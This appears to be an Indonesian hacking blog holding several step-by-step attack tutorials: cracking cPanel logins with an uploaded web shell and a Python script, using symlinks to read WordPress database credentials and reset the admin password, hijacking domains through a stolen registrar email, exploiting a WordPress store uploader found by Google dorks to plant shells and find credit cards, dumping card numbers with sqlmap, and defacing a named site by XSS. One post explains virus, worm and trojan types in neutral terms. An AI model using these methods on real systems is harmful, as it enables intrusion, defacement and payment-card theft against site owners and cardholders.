-=[ YUDA ANDIKA PUTRA ]=-

Selasa, 08 April 2014

0 Cara crack Cpanel dengan Python

Diposting oleh YUDA di 06.28

Cara crack Cpanel dengan Python

nih om.. Menurut Wikipedia.Org Python adalah
bahasa pemrograman interpretatif
multiguna dengan filosofi perancangan
yang berfokus pada tingkat keterbacaan
kode om..

Crack username dan password sebuah
Cpanel dengan cara ini sangat ampuh om.. di
banding dengan manual seperti Cpanel
Bruteforce yang harus membutuhkan
keberuntungan karena program tersebut wkkwk..
hanya menebak password dan
username suatu Cpanel.

Yang anda butuhkan:
[+] Python ( link dibawah om )
[+] Web yang berisikan Symlink / Config
[+] Cpanel Cracker ( link dibawah om)
* File cp.py taruh di folder Python yang
ada di system C
[+] Cmd.

Langkah-Langkah:
1. Upload killer.php ( Indishell ) kedalam
suatu web.
: Indishell
2. click use to Generate PHP.ini
Indishell
3. click use to Extract usernames
: Indishell
4. Click bhaiyu .. lets start
: INDISHELL
5. Jika berhasil
6. buka
Command Prompt.
: Cmd

6. Masukan perintah yang berwarna
merah di dalam Command Prompt:
C:\Users\Ihsan> cd/
C:\> cd Python27
C:\Python27> cp.py

Penjelasan:
cd/ = pergi ke system C
cd Python27 = masuk ke folder python
yang ada di sistem C
cp.py nama file yang ada di folder
Python27.

: Cp.Py

6. Setelah sukses maka akan ada
tampilan seperti Gambar 6. lalu
masukan perintah berikut kedalam Cmd:
C:\Python27>cp.py [Nama folder
Config/ Symlink/ Indishell/ Mbt kamu]
[Lokasi penyimpan Config]
* Disini ane ingin menaruh config nya
di folder Config yang ada di system C
jadi perintah ane adalah:
C:\Python27>cp.py http://site.com/
INDISHELL/ C:\Config
* Jangan lupa menaruh [ / ] pada awal
dan akhir kata INDISHELL karena hal
sepele ini bisa berakibat pada
kegagalan om
ex: /INDISHELL/
* Jangan lupa memakai huruf kapital
pada kata INDISHELL
indishell ( salah nih om)
INDISHELL ( True ).

: Eksekusi

8. Tekan tombol [ENTER] pada keyboard
mu, lalu akan muncul tampilan dan tunggu sampai selesai.
: List Password

9. Setelah sukses maka akan muncul list
password.
: Copy and Paste

10. Copy list password tersebut dengan
cara
click kanan -> Mark -> ENTER

11. Upload cp.php lalu buka cp.php

12. Taruh list password ke dalam kotak
pass: lalu click start.
: Password dan Username
Cpanel

13. Lalu jika berhasil maka akan muncul
username dan password Cpanel.

14. Masuk ke halaman login CPanel
ex: http://site.com:2082
: CPanel

15. Masukan username dan password
CPanel yang sudah didapat tadi.
: Sukses
: Sukses

16. Jika berhasil maka akan masuk ke
halaman CPanel korban.

0 Tutorial Jumping with Symlink

Diposting oleh YUDA di 06.27

Tutorial Jumping with Symlink

Apa Kabar Family INCEF ??

hehe, langsung aja ya,

bahan:
-Shell(kalo sudah punyak lewat)
-Sym.php
-kodok.php/shell kodok kalo biasanya aku nyebut bisa juga pkek koneksi MySql yang ada tulisnya "MySQL Interface (Developed By Mohajer22)"
yang itu enk koneksinya drpd shell kodok

Note: yang mau bahan2nya PM me link donwloadnya Tongue

Ntar w sharenya yang By Mohajer22 kalo kalian mintak yang kodok
yah silahkan ntar jadi satu paket sama rarnya Tongue

jadi woles kk Tongue

yah pertama saya anggap kalian sudah punyak website yang di tanami backdoor/shell

langsung saja pasang Sym.php di shell kalian
jangan lupa biasanya kalo w biasanya nanem di public_html
jadinya ntar gini http://www.site.com/Sym.php

trus pasang koneksi MySqlnya kalo pakek mohajer22 di upload kalo pakek kodok bisa langsung ntar upload udh termasuk isinya kyk index.php ,dll kalo mohajer22 cman buat ngisi untuk data MySqlnya ntar

oke langngsung kita
ke Sym.php

cari site yang ada isinya
jangan lupa klik tulisan symlinknya ya Big Grin

wp-config.php<-- kalo gini biasanya wordpress
config.php/coniguration.php <-- joomla kalo gini
oke trus di klik misalnya wp-config.php
kan ntar masuk ada tulisnya banyak kan
itu cari tulisan gini

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'admin_wp551');

/** MySQL database username */
define('DB_USER', 'admin_wp551');

/** MySQL database password */
define('DB_PASSWORD', '9kSP79quhi');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

sep lanjut kita ke koneksi Mysql inget kalian ngasih nama apa koneksi Mysqlnya
misalnya masang di public_html namnya MySql.php tinggal buka aja
http://www.site.com/MySql.php

oke kalo udh masu masukan aja username di db yang tadi sama passnya yang di db tadi Big Grin

contoh
Username:admin_wp551
password:9kSP79quhi

oke trus login

habis masuk ntar ada db misalnya ini
admin_wp551 ini di klik tables

cari di tables tersebut wp_user (pkoknya yang bersangkutan dengan users)

kalo udh ketmu langsung edit table adminya
passnya di gnti klo yang pkek mohajer22 harus dalam bentuk decryp kyk md5 kalo yang shell kodok bisa tulisan langsung oke langsung kita bahas yang mohajer22 soalnya lebih enk

w gnti passnya sama admin:21232f297a57a5a743894a0e4a801fc3

masukan kode 21232f297a57a5a743894a0e4a801fc3 ini ke table passnya
trus save dah
oke langsung ke adminya sekerang

kalo wordpress biasanya admin pagenya di
http://www.site.com/wp-admin

masukan username sma passnya

misalnya
username:admin
password:admin (yang udh kita gnti tadi Big Grin

)

warning : tutorial ini diciptakan untuk generasi manusia-manusia muda yang di persiapkan agar bisa membangunkan tidurnya sang raksasa

0 Perbedaan antara Virus, Worm, Trojan, Backdoor, Malware dan Spyware

Diposting oleh YUDA di 06.23

Perbedaan antara Virus, Worm, Trojan, Backdoor, Malware dan Spyware

Masih banyak sekali orang yang bingung dan tabu tentang perbedaan virus, worm, trojan, backdoor, malware, dan spyware. Berikut ini adalah penjelasan yang bertujuan agar pembaca lebih mengerti dan paham supaya lebih bijak menggunakan antivirus dalam komputer pribadi masing-masing dan tidak asal delete, karena tidak semua file yang ditangkap oleh antivirus itu membahayakan buat PC.

1. Virus

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2 yang terbaru pun Windows Vista dan Win7; bahkan baru2 ini sudah merambah ke GNU/Linux.

Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistem operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistem operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut atau dengan kata lain telah up to date.

Beberapa Contoh antivirus yang bisa diandalkan dan menangkal virus adalah KasperSky, AVG, NOD32, AntiVir, PCMAV, Norton, Norman, dan McAfee dan masih banyak lagi bahkan Antivirus lokal pun sekarang mulai marak dibicarakan Seperti Smadav, Ansav, dan yang terbaru Artav.

2. Worm

Worm adalah jenis virus yang tidak menginfeksi program lainnya. Ia membuat copy dirinya sendiri (Cloning) dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.

3. Trojan

Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah komputer. Sifat trojan adalah mengkontrol komputer secara otomatis. Misalnya komputer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote administration tools) dimana sebuah komputer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka komputer agar dapat dimasuki oleh komputer dan diaccess dari jauh, bahkan beberapa RAT's terbaru sudah mempnyai fungsi yang lebih lengkap diantaranya dilengkapi fungsi keylogger, yang bahkan bisa memerintahkan komputer yang terinfeksi sebagai pasukan untuk menyerang (Baca:Bot).

4. Backdoor

Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya dengan tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit, dalam hal ini biasanya disisipkan kedalam shell code sehingga pemilik shell bisa leluasa mendapatkan info apapun tentang host.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor (Shell code) yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat (jaman jadul), yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX. Sekarang fungsi sudah tergantikan oleh beberapa Rat's terbaru seperti cybergate dan poison ivy prorat; dimana backdoor dan trojan saling melengkapi.

5. Malware

Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit.

6. Spyware

Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer (terutama berinternet) seseorang, sampai yang berbahaya seperti nomor kartu kredit dan PIN untuk perbankan elektronik (e-banking) serta password suatu account. Dari situs yang sering dikunjungi, informasi yang kerap dicari oleh si spyware biasanya adalah obrolan di ruang chat (akan dimata-matai). Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang model begini. Penyebaran spyware mirip dengan Trojan, contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, lalu biarkan komputer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.

Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date; Dan jangan lupa pakai Anti Virus yang sudah dilengkapi dengan Internet Security. Kalau perlu tambahkan juga Firewall untuk keamanan yang berlapis guna melindungi PC anda dari serangan langsung maupun tidak langsung.

Semoga Bermanfaat!

0 Cara simple Hack Website dengan DNS Hijacking Teknik

Diposting oleh YUDA di 06.19

Cara simple Hack Website dengan DNS Hijacking Teknik

Cara simple Hack
Website dengan
DNS Hijacking Teknik

DNS Hijacking adalah teknik peretasan
dengan mengubah DNS pada suatu
website, yang menyebabkan ketika
seseorang mengaksesnya, maka
halaman yang ditampilkan adalah
halaman deface milik si attacker /
pelaku DNS Hijacking.

1. pertama adalah cek whois
dari web target.
caranya, pergi ke www.who.is/whois/
[situs target]
tujuan dari melihat whois ini adalah
melihat data register dari domain
tersebut.
yaitu dimana web tersebut didaftarkan
dan alamat email yang digunakan untuk
mendaftarkan domain tersebut.

2. kedua adalah hack email yang
digunakan untuk mendaftarkan domain
tersebut.
Kalo teknik hack email tentu saja butuh
social engineering yang bagus. Untuk
teknik social engineering bisa kalian cari
refrensinya di google.

selanjutnya adalah login client
di domain registry.
pada step pertama, kta tau dimana
domain tersebut didaftarkan. nah, kita
bisa login di register domain tersebut
dengan email yang telah kita hack. jika
bingung langsung saja reset password.

ganti nameserver domain.
Setelah berhasil masuk ke panel
domain, silahkan ganti ns domain
dengan ns domain yang kita inginkan.
Jika kalian punya WHM atau cPanel,
arahkan saja ns nya ke WHM / cPanel
kalian.

3. terakhir, buat akun domain di
WHM kalian atau tambahkan domain
yang ingin di hijack di addons domain
jika kalian menggunakan cPanel.
Done, domain pasti terarah ke server
baru yang telah kalian setting. Tinggal
buat file index.php dan 404.php dengan
script deface kalian.

0 Cara Deface Web dengan Metode Wp-Store Uploader

Diposting oleh YUDA di 06.18

Cara Deface Web dengan Metode Wp-Store Uploader

Cara Deface Web dengan
Metode Wp-Store Uploader ‪sekalian cari cc fresh:3

Kelebihan menggunakan teknik ini:
1. Jika anda beruntung, anda bisa
mendapatkan kartu kredit (cc).
2. Cara penggunaannya relatif mudah.

Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*ente bisa menambahkan elemen Site:
Di belakang Google Dork Tersebut
Ex: site:co.uk dll
2. Setelah Target ditemukan. langkah
selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/
eShop/style.css
menjadi
site.com/ wp-content/themes/WPStore/
upload/

3. Setelah muncul tampilan. Lalu ente Upload
Shell / Script Deface dalam bentuk .html om..
4. Setelah selesai, masukkan wp-
content/uploads/products_img/
namashell.php setelah alamat web
target.
Ex: site.com/ wp-content/themes/
WPStore/upload/
menjadi
site.com/ wp-content/uploads/
products_img/namashell.php
*nama shell diganti dengan nama shell ente..
*jika 404 not found, berarti web tersebut
tidak bisa di tanam shell. dan cobalah
untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas
deh index.php nya. bukan index.html
nya om..

Good Joob :)

0 Tutorial Carding ( with carding dork & sqlmap )

Diposting oleh YUDA di 06.17

Tutorial Carding ( with carding dork & sqlmap )

Yok Langsung aja ! buka dikitt Josss ! :p

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :

Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="

http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268

Nah, web tersebut error saat kita inject ,

Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs

Disini kita mendapatkan 3 database :

[*] balboast_gkgbu

[*] balboast_gkgcart

[*] information_schema

Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )

nah, saya dapat tables nya :

Database: balboast_gkgcart

[88 tables]

+-----------------------+

| amanu |

| categories |

| clients |

| components |

| config |

| config_groups |

| customers |

| form_data |

| form_fields |

| forms |

| geo |

| groups |

| item_amanu |

| item_cat |

| item_files |

| item_files_customer |

| item_options |

| item_options_linked |

| item_options_values |

| item_related |

| item_thread |

| item_thread_old |

| items |

| items_addphoto |

| items_item_files |

| items_packages |

| languages |

| logs |

| mailinglist |

| mailinglist_cat |

| mailinglist_members |

| manu |

| news |

| news_cat |

| news_news_cat |

| orders |

| photos |

| photos_cat |

| pic_gallery |

| ship_prices |

| ship_zones |

| sites |

| sites_components |

| thread |

| thread_gel |

| thread_items |

| ups |

| ups_packaging |

| ups_pickup |

| ups_service |

| ups_units |

| users |

| users_access |

| users_groups |

| users_spu |

| users_spu_values |

| zones |

+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini :

Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

0 Deface Website Menggunakan Teknik XSS Vulnerability

Diposting oleh YUDA di 05.26

Deface Website Menggunakan Teknik XSS Vulnerability

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by .::||SIT4MFAN48||::. ||ANYER BLACKHAT||</h1></marquee>

4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

CONTOH WEB YANG UDAH SAYA DEFACE => http://www.cryosys.de/cryosys.de/showcatrows.php?CategoryID=1%22%3E%3Cmarquee%3E%3Ch1%3EHacked%20by%20SIT4MF4N48||ANYER%20BLACKHAT%3C/h1%3E%3C/marquee%3E

Source: Hacker Newbie